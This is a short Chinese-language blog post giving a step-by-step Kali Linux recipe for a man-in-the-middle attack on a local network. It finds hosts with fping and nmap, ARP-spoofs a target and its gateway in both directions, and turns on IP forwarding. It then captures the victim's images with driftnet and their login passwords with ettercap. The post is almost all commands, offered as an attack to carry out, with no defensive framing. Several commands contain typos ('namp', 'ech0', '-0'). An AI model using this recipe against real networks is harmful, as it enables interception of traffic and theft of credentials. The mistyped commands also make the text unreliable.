kali 局域網ARP欺騙

1.第一種

####發現目標IP

fping -g -r 0  -s x.x.x.0/24 | grep alive

或者

nmap -T4 -A -v 局域網


####系統檢查
namp -T4 -0 目標IP

####ARP欺騙
arpspoof -i eth0(網卡) -t 目標IP 網關

arpspoof -i eth0(網卡) -t 網關   目標IP

雙向欺騙

####端口轉發
ech0 1 > /proc/sys/net/ipv4/ip_forward

####圖片嗅探
driftnet -i eth0

####嗅探登錄密碼
ettercap -Tq -i eth0

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章